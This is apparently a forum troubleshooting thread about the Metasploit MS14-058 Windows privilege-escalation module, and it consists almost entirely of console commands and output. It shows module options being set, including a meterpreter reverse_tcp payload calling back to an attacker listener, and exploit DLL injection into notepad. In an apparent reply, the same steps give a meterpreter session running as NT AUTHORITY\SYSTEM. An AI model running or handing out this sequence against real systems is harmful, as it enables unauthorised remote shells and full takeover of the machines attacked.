Windows privilege escalation exploit
Hi, I’m having troubles with exploit/windows/local/ms14_058_track_popup_menu.
Here is some info:
meterpreter > sysinfo
Computer : WORKSTATION1
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Meterpreter : x64/win64
meterpreter > getuid
Server username: CONTOSO\allenbrewer
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect.
msf > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > set LHOST 192.168.1.100
LHOST => 192.168.1.100
msf exploit(ms14_058_track_popup_menu) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf exploit(ms14_058_track_popup_menu) > set LPORT 28746
LPORT => 28746
msf exploit(ms14_058_track_popup_menu) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(ms14_058_track_popup_menu) > set TARGET 1
TARGET => 1
msf exploit(ms14_058_track_popup_menu) > set SESSION 3
SESSION => 3
msf exploit(ms14_058_track_popup_menu) > set ExitOnSession false
ExitOnSession => false
msf exploit(ms14_058_track_popup_menu) > exploit -j
[*] Exploit running as background job.
[*] Launching notepad to host the exploit...
[+] Process 2268 launched.
[*] Reflectively injecting the exploit DLL into 2268...
[*] Injecting exploit into 2268...
[*] Exploit injected. Injecting payload into 2268...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[nothing (no shell) comes back]
The win32k.sys product version on the target machine is 6.1.7601.17514.
"[*] win32k.sys file version: 6.1.7601.17514 branch: 17"
Now we can get SYSTEM privilege, Thanks.
Host Name: NFS-001
OS Name: Microsoft Windows 7 Home Premium
OS Version: 6.1.7601 Service Pack 1 Build 7601
msf > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 nfs-001\nfs @ NFS-001 192.168.108.113:4444 -> 192.168.108.197:2735 (192.168.108.197)
msf exploit(ms14_058_track_popup_menu) > set SESSION 1
SESSION => 1
msf exploit(ms14_058_track_popup_menu) > run
[*] Started reverse handler on 192.168.108.113:4444
[*] Launching notepad to host the exploit...
[+] Process 2732 launched.
[*] Reflectively injecting the exploit DLL into 2732...
[*] Injecting exploit into 2732...
[*] Exploit injected. Injecting payload into 2732...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (770048 bytes) to 192.168.108.197
[*] Meterpreter session 2 opened (192.168.108.113:4444 -> 192.168.108.197:2787) at 2015-02-10 07:46:21 +0000
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM